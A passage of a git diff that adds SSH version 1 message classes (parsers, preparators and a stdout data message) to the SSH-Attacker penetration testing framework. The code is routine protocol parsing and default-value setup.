de.rub.nds.sshattacker.core.protocol.ssh1.parser.StdoutDataMessageSSHv1Parser; +import de.rub.nds.sshattacker.core.protocol.ssh1.preparator.StdinDataMessageSSHV1Preparator; +import de.rub.nds.sshattacker.core.protocol.ssh1.preparator.StdoutDataMessageSSHV1Preparator; +import de.rub.nds.sshattacker.core.protocol.ssh1.serializer.StdinDataMessageSSHV1Serializier; +import de.rub.nds.sshattacker.core.protocol.ssh1.serializer.StdoutDataMessageSSHV1Serializier; + +import java.io.InputStream; + +public class StdoutDataMessageSSH1 extends SshMessage { + + private ModifiableString data; + + public ModifiableString getData() { + return data; + } + + public void setData(ModifiableString disconnectReason) { + data = disconnectReason; + } + + public void setData(String disconnectReason) { + data = + ModifiableVariableFactory.safelySetValue(data, disconnectReason); + } + + @Override + public StdoutDataMessageSSHV1Handler getHandler(SshContext context) { + return new StdoutDataMessageSSHV1Handler(context); + } + + @Override + public SshMessageParser getParser( + SshContext context, InputStream stream) { + return new StdoutDataMessageSSHv1Parser(context, stream); + } + + @Override + public SshMessagePreparator getPreparator(SshContext context) { + return new StdoutDataMessageSSHV1Preparator(context.getChooser(), this); + } + + @Override + public SshMessageSerializer getSerializer(SshContext context) { + return new StdoutDataMessageSSHV1Serializier(this); + } + + @Override + public String toShortString() { + return "Disconnect Message"; + } +} diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/parser/DebugMessageSSHv1Parser.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/parser/DebugMessageSSHv1Parser.java new file mode 100644 index 000000000..63c9cfef7 --- /dev/null +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/parser/DebugMessageSSHv1Parser.java @@ -0,0 +1,40 @@ +/* + * SSH-Attacker - A Modular Penetration Testing Framework for SSH + * + * Copyright 2014-2022 Ruhr University Bochum, Paderborn University, and Hackmanit GmbH + * + * Licensed under Apache License 2.0 http://www.apache.org/licenses/LICENSE-2.0 + */ +package de.rub.nds.sshattacker.core.protocol.ssh1.parser; + +import de.rub.nds.sshattacker.core.layer.context.SshContext; +import de.rub.nds.sshattacker.core.protocol.common.SshMessageParser; +import de.rub.nds.sshattacker.core.protocol.ssh1.message.DebugMessageSSH1; +import org.apache.logging.log4j.LogManager; +import org.apache.logging.log4j.Logger; + +import java.io.InputStream; + +public class DebugMessageSSHv1Parser extends SshMessageParser { + private static final Logger LOGGER = LogManager.getLogger(); + public DebugMessageSSHv1Parser(SshContext context, InputStream stream) { + super(stream); + } + + private void parseDebugMessage(DebugMessageSSH1 message) { + int lenght = parseIntField(4); + String debugReason = parseByteString(lenght); + message.setDebugMessage(debugReason); + } + + @Override + protected void parseMessageSpecificContents(DebugMessageSSH1 message) { + parseDebugMessage(message); + + } + + @Override + public void parse(DebugMessageSSH1 message) { + parseProtocolMessageContents(message); + } +} diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/parser/EofMessageSSHV1Parser.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/parser/EofMessageSSHV1Parser.java new file mode 100644 index 000000000..b059f5e56 --- /dev/null +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/parser/EofMessageSSHV1Parser.java @@ -0,0 +1,33 @@ +/* + * SSH-Attacker - A Modular Penetration Testing Framework for SSH + * + * Copyright 2014-2022 Ruhr University Bochum, Paderborn University, and Hackmanit GmbH + * + * Licensed under Apache License 2.0 http://www.apache.org/licenses/LICENSE-2.0 + */ +package de.rub.nds.sshattacker.core.protocol.ssh1.parser; + +import de.rub.nds.sshattacker.core.layer.context.SshContext; +import de.rub.nds.sshattacker.core.protocol.common.SshMessageParser; +import de.rub.nds.sshattacker.core.protocol.ssh1.message.EofMessageSSH1; +import de.rub.nds.sshattacker.core.protocol.ssh1.message.SuccessMessageSSH1; +import org.apache.logging.log4j.LogManager; +import org.apache.logging.log4j.Logger; + +import java.io.InputStream; + +public class EofMessageSSHV1Parser extends SshMessageParser { + private static final Logger LOGGER = LogManager.getLogger(); + + public EofMessageSSHV1Parser(SshContext context, InputStream stream) { + super(stream); + } + + @Override + protected void parseMessageSpecificContents(EofMessageSSH1 message) {} + + @Override + public void parse(EofMessageSSH1 message) { + parseProtocolMessageContents(message); + } +} diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/parser/ExecCmdMessageSSHv1Parser.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/parser/ExecCmdMessageSSHv1Parser.java new file mode 100644 index 000000000..ada751c35 --- /dev/null +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/parser/ExecCmdMessageSSHv1Parser.java @@ -0,0 +1,41 @@ +/* + * SSH-Attacker - A Modular Penetration Testing Framework for SSH + * + * Copyright 2014-2022 Ruhr University Bochum, Paderborn University, and Hackmanit GmbH + * + * Licensed under Apache License 2.0 http://www.apache.org/licenses/LICENSE-2.0 + */ +package de.rub.nds.sshattacker.core.protocol.ssh1.parser; + +import de.rub.nds.sshattacker.core.layer.context.SshContext; +import de.rub.nds.sshattacker.core.protocol.common.SshMessageParser; +import de.rub.nds.sshattacker.core.protocol.ssh1.message.DebugMessageSSH1; +import de.rub.nds.sshattacker.core.protocol.ssh1.message.ExecCmdMessageSSH1; +import org.apache.logging.log4j.LogManager; +import org.apache.logging.log4j.Logger; + +import java.io.InputStream; + +public class ExecCmdMessageSSHv1Parser extends SshMessageParser { + private static final Logger LOGGER = LogManager.getLogger(); + public ExecCmdMessageSSHv1Parser(SshContext context, InputStream stream) { + super(stream); + } + + private void parseIgnoreReason(ExecCmdMessageSSH1 message) { + int lenght = parseIntField(4); + String debugReason = parseByteString(lenght); + message.setCommand(debugReason); + } + + @Override + protected void parseMessageSpecificContents(ExecCmdMessageSSH1 message) { + parseIgnoreReason(message); + + } + + @Override + public void parse(ExecCmdMessageSSH1 message) { + parseProtocolMessageContents(message); + } +} diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/parser/ExecShellMessageSSHV1Parser.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/parser/ExecShellMessageSSHV1Parser.java new file mode 100644 index 000000000..1be092352 --- /dev/null +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/parser/ExecShellMessageSSHV1Parser.java @@ -0,0 +1,33 @@ +/* + * SSH-Attacker - A Modular Penetration Testing Framework for SSH + * + * Copyright 2014-2022 Ruhr University Bochum, Paderborn University, and Hackmanit GmbH + * + * Licensed under Apache License 2.0 http://www.apache.org/licenses/LICENSE-2.0 + */ +package de.rub.nds.sshattacker.core.protocol.ssh1.parser; + +import de.rub.nds.sshattacker.core.layer.context.SshContext; +import de.rub.nds.sshattacker.core.protocol.common.SshMessageParser; +import de.rub.nds.sshattacker.core.protocol.ssh1.message.ExecShellMessageSSH1; +import de.rub.nds.sshattacker.core.protocol.ssh1.message.SuccessMessageSSH1; +import org.apache.logging.log4j.LogManager; +import org.apache.logging.log4j.Logger; + +import java.io.InputStream; + +public class ExecShellMessageSSHV1Parser extends SshMessageParser { + private static final Logger LOGGER = LogManager.getLogger(); + + public ExecShellMessageSSHV1Parser(SshContext context, InputStream stream) { + super(stream); + } + + @Override + protected void parseMessageSpecificContents(ExecShellMessageSSH1 message) {} + + @Override + public void parse(ExecShellMessageSSH1 message) { + parseProtocolMessageContents(message); + } +} diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/parser/ExitConfirmationMessageSSHV1Parser.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/parser/ExitConfirmationMessageSSHV1Parser.java new file mode 100644 index 000000000..4554735c8 --- /dev/null +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/parser/ExitConfirmationMessageSSHV1Parser.java @@ -0,0 +1,33 @@ +/* + * SSH-Attacker - A Modular Penetration Testing Framework for SSH + * + * Copyright 2014-2022 Ruhr University Bochum, Paderborn University, and Hackmanit GmbH + * + * Licensed under Apache License 2.0 http://www.apache.org/licenses/LICENSE-2.0 + */ +package de.rub.nds.sshattacker.core.protocol.ssh1.parser; + +import de.rub.nds.sshattacker.core.layer.context.SshContext; +import de.rub.nds.sshattacker.core.protocol.common.SshMessageParser; +import de.rub.nds.sshattacker.core.protocol.ssh1.message.EofMessageSSH1; +import de.rub.nds.sshattacker.core.protocol.ssh1.message.ExitConfirmationMessageSSH1; +import org.apache.logging.log4j.LogManager; +import org.apache.logging.log4j.Logger; + +import java.io.InputStream; + +public class ExitConfirmationMessageSSHV1Parser extends SshMessageParser { + private static final Logger LOGGER = LogManager.getLogger(); + + public ExitConfirmationMessageSSHV1Parser(SshContext context, InputStream stream) { + super(stream); + } + + @Override + protected void parseMessageSpecificContents(ExitConfirmationMessageSSH1 message) {} + + @Override + public void parse(ExitConfirmationMessageSSH1 message) { + parseProtocolMessageContents(message); + } +} diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/parser/ExitStatusMessageSSHV1Parser.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/parser/ExitStatusMessageSSHV1Parser.java new file mode 100644 index 000000000..7a5a26888 --- /dev/null +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/parser/ExitStatusMessageSSHV1Parser.java @@ -0,0 +1,40 @@ +/* + * SSH-Attacker - A Modular Penetration Testing Framework for SSH + * + * Copyright 2014-2022 Ruhr University Bochum, Paderborn University, and Hackmanit GmbH + * + * Licensed under Apache License 2.0 http://www.apache.org/licenses/LICENSE-2.0 + */ +package de.rub.nds.sshattacker.core.protocol.ssh1.parser; + +import de.rub.nds.sshattacker.core.layer.context.SshContext; +import de.rub.nds.sshattacker.core.protocol.common.SshMessageParser; +import de.rub.nds.sshattacker.core.protocol.ssh1.message.DebugMessageSSH1; +import de.rub.nds.sshattacker.core.protocol.ssh1.message.ExitStatusMessageSSH1; +import org.apache.logging.log4j.LogManager; +import org.apache.logging.log4j.Logger; + +import java.io.InputStream; + +public class ExitStatusMessageSSHV1Parser extends SshMessageParser { + private static final Logger LOGGER = LogManager.getLogger(); + + public ExitStatusMessageSSHV1Parser(SshContext context, InputStream stream) { + super(stream); + } + + private void parseExitStatus(ExitStatusMessageSSH1 message) { + int exitStatus = parseIntField(4); + message.setExitStatus(exitStatus); + } + + @Override + protected void parseMessageSpecificContents(ExitStatusMessageSSH1 message) { + parseExitStatus(message); + } + + @Override + public void parse(ExitStatusMessageSSH1 message) { + parseProtocolMessageContents(message); + } +} diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/parser/IgnoreMessageSSHV1Parser.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/parser/IgnoreMessageSSHV1Parser.java new file mode 100644 index 000000000..f9fb1fee2 --- /dev/null +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/parser/IgnoreMessageSSHV1Parser.java @@ -0,0 +1,49 @@ +/* + * SSH-Attacker - A Modular Penetration Testing Framework for SSH + * + * Copyright 2014-2022 Ruhr University Bochum, Paderborn University, and Hackmanit GmbH + * + * Licensed under Apache License 2.0 http://www.apache.org/licenses/LICENSE-2.0 + */ +package de.rub.nds.sshattacker.core.protocol.ssh1.parser; + +import de.rub.nds.modifiablevariable.util.ArrayConverter; +import de.rub.nds.sshattacker.core.layer.context.SshContext; +import de.rub.nds.sshattacker.core.protocol.common.SshMessageParser; +import de.rub.nds.sshattacker.core.protocol.ssh1.message.DisconnectMessageSSH1; +import de.rub.nds.sshattacker.core.protocol.ssh1.message.IgnoreMessageSSH1; +import org.apache.logging.log4j.LogManager; +import org.apache.logging.log4j.Logger; + +import java.io.InputStream; + +public class IgnoreMessageSSHV1Parser extends SshMessageParser { + private static final Logger LOGGER = LogManager.getLogger(); + public IgnoreMessageSSHV1Parser(SshContext context, InputStream stream) { + super(stream); + + } + + private void parseCRC(DisconnectMessageSSH1 message) { + byte[] CRC = parseByteArrayField(4); + LOGGER.debug("CRC: {}", ArrayConverter.bytesToHexString(CRC)); + } + + private void parseIgnoreMessage(IgnoreMessageSSH1 message) { + int lenght = parseIntField(4); + String ignoreMsg = parseByteString(lenght); + message.setIgnoreReason(ignoreMsg); + } + + @Override + protected void parseMessageSpecificContents(IgnoreMessageSSH1 message) { + parseIgnoreMessage(message); + } + + + + @Override + public void parse(IgnoreMessageSSH1 message) { + parseProtocolMessageContents(message); + } +} diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/parser/StderrDataMessageSSHv1Parser.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/parser/StderrDataMessageSSHv1Parser.java new file mode 100644 index 000000000..ed216c800 --- /dev/null +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/parser/StderrDataMessageSSHv1Parser.java @@ -0,0 +1,41 @@ +/* + * SSH-Attacker - A Modular Penetration Testing Framework for SSH + * + * Copyright 2014-2022 Ruhr University Bochum, Paderborn University, and Hackmanit GmbH + * + * Licensed under Apache License 2.0 http://www.apache.org/licenses/LICENSE-2.0 + */ +package de.rub.nds.sshattacker.core.protocol.ssh1.parser; + +import de.rub.nds.sshattacker.core.layer.context.SshContext; +import de.rub.nds.sshattacker.core.protocol.common.SshMessageParser; +import de.rub.nds.sshattacker.core.protocol.ssh1.message.StderrDataMessageSSH1; +import de.rub.nds.sshattacker.core.protocol.ssh1.message.StdoutDataMessageSSH1; +import org.apache.logging.log4j.LogManager; +import org.apache.logging.log4j.Logger; + +import java.io.InputStream; + +public class StderrDataMessageSSHv1Parser extends SshMessageParser { + private static final Logger LOGGER = LogManager.getLogger(); + public StderrDataMessageSSHv1Parser(SshContext context, InputStream stream) { + super(stream); + } + + private void parseIgnoreReason(StderrDataMessageSSH1 message) { + int lenght = parseIntField(4); + String debugReason = parseByteString(lenght); + message.setData(debugReason); + } + + @Override + protected void parseMessageSpecificContents(StderrDataMessageSSH1 message) { + parseIgnoreReason(message); + + } + + @Override + public void parse(StderrDataMessageSSH1 message) { + parseProtocolMessageContents(message); + } +} diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/parser/StdinDataMessageSSHv1Parser.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/parser/StdinDataMessageSSHv1Parser.java new file mode 100644 index 000000000..af6f052e3 --- /dev/null +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/parser/StdinDataMessageSSHv1Parser.java @@ -0,0 +1,41 @@ +/* + * SSH-Attacker - A Modular Penetration Testing Framework for SSH + * + * Copyright 2014-2022 Ruhr University Bochum, Paderborn University, and Hackmanit GmbH + * + * Licensed under Apache License 2.0 http://www.apache.org/licenses/LICENSE-2.0 + */ +package de.rub.nds.sshattacker.core.protocol.ssh1.parser; + +import de.rub.nds.sshattacker.core.layer.context.SshContext; +import de.rub.nds.sshattacker.core.protocol.common.SshMessageParser; +import de.rub.nds.sshattacker.core.protocol.ssh1.message.DebugMessageSSH1; +import de.rub.nds.sshattacker.core.protocol.ssh1.message.StdinDataMessageSSH1; +import org.apache.logging.log4j.LogManager; +import org.apache.logging.log4j.Logger; + +import java.io.InputStream; + +public class StdinDataMessageSSHv1Parser extends SshMessageParser { + private static final Logger LOGGER = LogManager.getLogger(); + public StdinDataMessageSSHv1Parser(SshContext context, InputStream stream) { + super(stream); + } + + private void parseIgnoreReason(StdinDataMessageSSH1 message) { + int lenght = parseIntField(4); + String debugReason = parseByteString(lenght); + message.setData(debugReason); + } + + @Override + protected void parseMessageSpecificContents(StdinDataMessageSSH1 message) { + parseIgnoreReason(message); + + } + + @Override + public void parse(StdinDataMessageSSH1 message) { + parseProtocolMessageContents(message); + } +} diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/parser/StdoutDataMessageSSHv1Parser.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/parser/StdoutDataMessageSSHv1Parser.java new file mode 100644 index 000000000..e59287dbf --- /dev/null +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/parser/StdoutDataMessageSSHv1Parser.java @@ -0,0 +1,41 @@ +/* + * SSH-Attacker - A Modular Penetration Testing Framework for SSH + * + * Copyright 2014-2022 Ruhr University Bochum, Paderborn University, and Hackmanit GmbH + * + * Licensed under Apache License 2.0 http://www.apache.org/licenses/LICENSE-2.0 + */ +package de.rub.nds.sshattacker.core.protocol.ssh1.parser; + +import de.rub.nds.sshattacker.core.layer.context.SshContext; +import de.rub.nds.sshattacker.core.protocol.common.SshMessageParser; +import de.rub.nds.sshattacker.core.protocol.ssh1.message.StdinDataMessageSSH1; +import de.rub.nds.sshattacker.core.protocol.ssh1.message.StdoutDataMessageSSH1; +import org.apache.logging.log4j.LogManager; +import org.apache.logging.log4j.Logger; + +import java.io.InputStream; + +public class StdoutDataMessageSSHv1Parser extends SshMessageParser { + private static final Logger LOGGER = LogManager.getLogger(); + public StdoutDataMessageSSHv1Parser(SshContext context, InputStream stream) { + super(stream); + } + + private void parseIgnoreReason(StdoutDataMessageSSH1 message) { + int lenght = parseIntField(4); + String debugReason = parseByteString(lenght); + message.setData(debugReason); + } + + @Override + protected void parseMessageSpecificContents(StdoutDataMessageSSH1 message) { + parseIgnoreReason(message); + + } + + @Override + public void parse(StdoutDataMessageSSH1 message) { + parseProtocolMessageContents(message); + } +} diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/preparator/DebugMessageSSHV1Preparator.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/preparator/DebugMessageSSHV1Preparator.java new file mode 100644 index 000000000..388fc8da9 --- /dev/null +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/preparator/DebugMessageSSHV1Preparator.java @@ -0,0 +1,38 @@ +/* + * SSH-Attacker - A Modular Penetration Testing Framework for SSH + * + * Copyright 2014-2022 Ruhr University Bochum, Paderborn University, and Hackmanit GmbH + * + * Licensed under Apache License 2.0 http://www.apache.org/licenses/LICENSE-2.0 + */ +package de.rub.nds.sshattacker.core.protocol.ssh1.preparator; + +import de.rub.nds.sshattacker.core.constants.MessageIdConstantSSH1; +import de.rub.nds.sshattacker.core.crypto.keys.CustomRsaPrivateKey; +import de.rub.nds.sshattacker.core.crypto.keys.CustomRsaPublicKey; +import de.rub.nds.sshattacker.core.crypto.keys.SshPublicKey; +import de.rub.nds.sshattacker.core.protocol.common.SshMessagePreparator; +import de.rub.nds.sshattacker.core.protocol.ssh1.message.DebugMessageSSH1; +import de.rub.nds.sshattacker.core.workflow.chooser.Chooser; +import org.apache.logging.log4j.LogManager; +import org.apache.logging.log4j.Logger; + +public class DebugMessageSSHV1Preparator extends SshMessagePreparator { + + private static final Logger LOGGER = LogManager.getLogger(); + + private SshPublicKey serverKey; + + public DebugMessageSSHV1Preparator(Chooser chooser, DebugMessageSSH1 message) { + super(chooser, message, MessageIdConstantSSH1.SSH_MSG_DEBUG); + } + + @Override + public void prepareMessageSpecificContents() { + LOGGER.debug("Preparring now..."); + if (getObject().getDebugMessage() == null) { + getObject().setDebugMessage("DummyValue"); + } + LOGGER.debug(getObject().getDebugMessage().getValue()); + } +} diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/preparator/EofMessageSSHV1Preparator.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/preparator/EofMessageSSHV1Preparator.java new file mode 100644 index 000000000..b27f25b3b --- /dev/null +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/preparator/EofMessageSSHV1Preparator.java @@ -0,0 +1,30 @@ +/* + * SSH-Attacker - A Modular Penetration Testing Framework for SSH + * + * Copyright 2014-2022 Ruhr University Bochum, Paderborn University, and Hackmanit GmbH + * + * Licensed under Apache License 2.0 http://www.apache.org/licenses/LICENSE-2.0 + */ +package de.rub.nds.sshattacker.core.protocol.ssh1.preparator; + +import de.rub.nds.sshattacker.core.constants.MessageIdConstantSSH1; +import de.rub.nds.sshattacker.core.protocol.common.SshMessagePreparator; +import de.rub.nds.sshattacker.core.protocol.ssh1.message.EofMessageSSH1; +import de.rub.nds.sshattacker.core.protocol.ssh1.message.SuccessMessageSSH1; +import de.rub.nds.sshattacker.core.workflow.chooser.Chooser; +import org.apache.logging.log4j.LogManager; +import org.apache.logging.log4j.Logger; + +public class EofMessageSSHV1Preparator extends SshMessagePreparator { + + private static final Logger LOGGER = LogManager.getLogger(); + + public EofMessageSSHV1Preparator(Chooser chooser, EofMessageSSH1 message) { + super(chooser, message, MessageIdConstantSSH1.SSH_CMSG_EOF); + } + + @Override + public void prepareMessageSpecificContents() { + LOGGER.debug("Preparring now..."); + } +} diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/preparator/ExecCmdMessageSSHV1Preparator.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/preparator/ExecCmdMessageSSHV1Preparator.java new file mode 100644 index 000000000..be23e3e35 --- /dev/null +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/preparator/ExecCmdMessageSSHV1Preparator.java @@ -0,0 +1,39 @@ +/* + * SSH-Attacker - A Modular Penetration Testing Framework for SSH + * + * Copyright 2014-2022 Ruhr University Bochum, Paderborn University, and Hackmanit GmbH + * + * Licensed under Apache License 2.0 http://www.apache.org/licenses/LICENSE-2.0 + */ +package de.rub.nds.sshattacker.core.protocol.ssh1.preparator; + +import de.rub.nds.sshattacker.core.constants.MessageIdConstantSSH1; +import de.rub.nds.sshattacker.core.crypto.keys.CustomRsaPrivateKey; +import de.rub.nds.sshattacker.core.crypto.keys.CustomRsaPublicKey; +import de.rub.nds.sshattacker.core.crypto.keys.SshPublicKey; +import de.rub.nds.sshattacker.core.protocol.common.SshMessagePreparator; +import de.rub.nds.sshattacker.core.protocol.ssh1.message.DebugMessageSSH1; +import de.rub.nds.sshattacker.core.protocol.ssh1.message.ExecCmdMessageSSH1; +import de.rub.nds.sshattacker.core.workflow.chooser.Chooser; +import org.apache.logging.log4j.LogManager; +import org.apache.logging.log4j.Logger; + +public class ExecCmdMessageSSHV1Preparator extends SshMessagePreparator { + + private static final Logger LOGGER = LogManager.getLogger(); + + private SshPublicKey serverKey; + + public ExecCmdMessageSSHV1Preparator(Chooser chooser, ExecCmdMessageSSH1 message) { + super(chooser, message, MessageIdConstantSSH1.SSH_CMSG_EXEC_CMD); + } + + @Override + public void prepareMessageSpecificContents() { + LOGGER.debug("Preparring now..."); + if (getObject().getCommand() == null) { + getObject().setCommand("DummyValue"); + } + LOGGER.debug(getObject().getCommand().getValue()); + } +} diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/preparator/ExecShellMessageSSHV1Preparator.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/preparator/ExecShellMessageSSHV1Preparator.java new file mode 100644 index 000000000..ed5d95deb --- /dev/null +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/preparator/ExecShellMessageSSHV1Preparator.java @@ -0,0 +1,29 @@ +/* + * SSH-Attacker - A Modular Penetration Testing Framework for SSH + * + * Copyright 2014-2022 Ruhr University Bochum, Paderborn University, and Hackmanit GmbH + * + * Licensed under Apache License 2.0 http://www.apache.org/licenses/LICENSE-2.0 + */ +package de.rub.nds.sshattacker.core.protocol.ssh1.preparator; + +import de.rub.nds.sshattacker.core.constants.MessageIdConstantSSH1; +import de.rub.nds.sshattacker.core.protocol.common.SshMessagePreparator; +import de.rub.nds.sshattacker.core.protocol.ssh1.message.ExecShellMessageSSH1; +import de.rub.nds.sshattacker.core.workflow.chooser.Chooser; +import org.apache.logging.log4j.LogManager; +import org.apache.logging.log4j.Logger; + +public class ExecShellMessageSSHV1Preparator extends SshMessagePreparator { + + private static final Logger LOGGER = LogManager.getLogger(); + + public ExecShellMessageSSHV1Preparator(Chooser chooser, ExecShellMessageSSH1 message) { + super(chooser, message, MessageIdConstantSSH1.SSH_CMSG_EXEC_SHELL); + } + + @Override + public void prepareMessageSpecificContents() { + LOGGER.debug("Preparring now..."); + } +} diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/preparator/ExitConfirmationMessageSSHV1Preparator.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/preparator/ExitConfirmationMessageSSHV1Preparator.java new file mode 100644 index 000000000..a09296dd6 --- /dev/null +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/preparator/ExitConfirmationMessageSSHV1Preparator.java @@ -0,0 +1,30 @@ +/* + * SSH-Attacker - A Modular Penetration Testing Framework for SSH + * + * Copyright 2014-2022 Ruhr University Bochum, Paderborn University, and Hackmanit GmbH + * + * Licensed under Apache License 2.0 http://www.apache.org/licenses/LICENSE-2.0 + */ +package de.rub.nds.sshattacker.core.protocol.ssh1.preparator; + +import de.rub.nds.sshattacker.core.constants.MessageIdConstantSSH1; +import de.rub.nds.sshattacker.core.protocol.common.SshMessagePreparator; +import de.rub.nds.sshattacker.core.protocol.ssh1.message.EofMessageSSH1; +import de.rub.nds.sshattacker.core.protocol.ssh1.message.ExitConfirmationMessageSSH1; +import de.rub.nds.sshattacker.core.workflow.chooser.Chooser; +import org.apache.logging.log4j.LogManager; +import org.apache.logging.log4j.Logger; + +public class ExitConfirmationMessageSSHV1Preparator extends SshMessagePreparator { + + private static final Logger LOGGER = LogManager.getLogger(); + + public ExitConfirmationMessageSSHV1Preparator(Chooser chooser, ExitConfirmationMessageSSH1 message) { + super(chooser, message, MessageIdConstantSSH1.SSH_CMSG_EXIT_CONFIRMATION); + } + + @Override + public void prepareMessageSpecificContents() { + LOGGER.debug("Preparring now..."); + } +} diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/preparator/ExitStatusMessageSSHV1Preparator.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/preparator/ExitStatusMessageSSHV1Preparator.java new file mode 100644 index 000000000..ac9d4ad69 --- /dev/null +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/preparator/ExitStatusMessageSSHV1Preparator.java @@ -0,0 +1,34 @@ +/* + * SSH-Attacker - A Modular Penetration Testing Framework for SSH + * + * Copyright 2014-2022 Ruhr University Bochum, Paderborn University, and Hackmanit GmbH + * + * Licensed under Apache License 2.0 http://www.apache.org/licenses/LICENSE-2.0 + */ +package de.rub.nds.sshattacker.core.protocol.ssh1.preparator; + +import de.rub.nds.sshattacker.core.constants.MessageIdConstantSSH1; +import de.rub.nds.sshattacker.core.protocol.common.SshMessagePreparator; +import de.rub.nds.sshattacker.core.protocol.ssh1.message.ExitConfirmationMessageSSH1; +import de.rub.nds.sshattacker.core.protocol.ssh1.message.ExitStatusMessageSSH1; +import de.rub.nds.sshattacker.core.workflow.chooser.Chooser; +import org.apache.logging.log4j.LogManager; +import org.apache.logging.log4j.Logger; + +public class ExitStatusMessageSSHV1Preparator extends SshMessagePreparator { + + private static final Logger LOGGER = LogManager.getLogger(); + + public ExitStatusMessageSSHV1Preparator(Chooser chooser, ExitStatusMessageSSH1 message) { + super(chooser, message, MessageIdConstantSSH1.SSH_SMSG_EXITSTATUS); + } + + @Override + public void prepareMessageSpecificContents() { + LOGGER.debug("Preparring now..."); + if (getObject().getExitStatus() == null) { + getObject().setExitStatus(0); + } + LOGGER.debug(getObject().getExitStatus().getValue()); + } +} diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/preparator/IgnoreMessageSSHV1Preparator.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/preparator/IgnoreMessageSSHV1Preparator.java new file mode 100644 index 000000000..2307e36a3 --- /dev/null +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/preparator/IgnoreMessageSSHV1Preparator.java @@ -0,0 +1,38 @@ +/* + * SSH-Attacker - A Modular Penetration Testing Framework for SSH + * + * Copyright 2014-2022 Ruhr University Bochum, Paderborn University, and Hackmanit GmbH + * + * Licensed under Apache License 2.0 http://www.apache.org/licenses/LICENSE-2.0 + */ +package de.rub.nds.sshattacker.core.protocol.ssh1.preparator; + +import de.rub.nds.sshattacker.core.constants.MessageIdConstantSSH1; +import de.rub.nds.sshattacker.core.crypto.keys.CustomRsaPrivateKey; +import de.rub.nds.sshattacker.core.crypto.keys.CustomRsaPublicKey; +import de.rub.nds.sshattacker.core.crypto.keys.SshPublicKey; +import de.rub.nds.sshattacker.core.protocol.common.SshMessagePreparator; +import de.rub.nds.sshattacker.core.protocol.ssh1.message.IgnoreMessageSSH1; +import de.rub.nds.sshattacker.core.workflow.chooser.Chooser; +import org.apache.logging.log4j.LogManager; +import org.apache.logging.log4j.Logger; + +public class IgnoreMessageSSHV1Preparator extends SshMessagePreparator { + + private static final Logger LOGGER = LogManager.getLogger(); + + private SshPublicKey serverKey; + + public IgnoreMessageSSHV1Preparator(Chooser chooser, IgnoreMessageSSH1 message) { + super(chooser, message, MessageIdConstantSSH1.SSH_MSG_IGNORE); + } + + @Override + public void prepareMessageSpecificContents() { + LOGGER.debug("Preparring now..."); + if (getObject().getIgnoreMessage() == null) { + 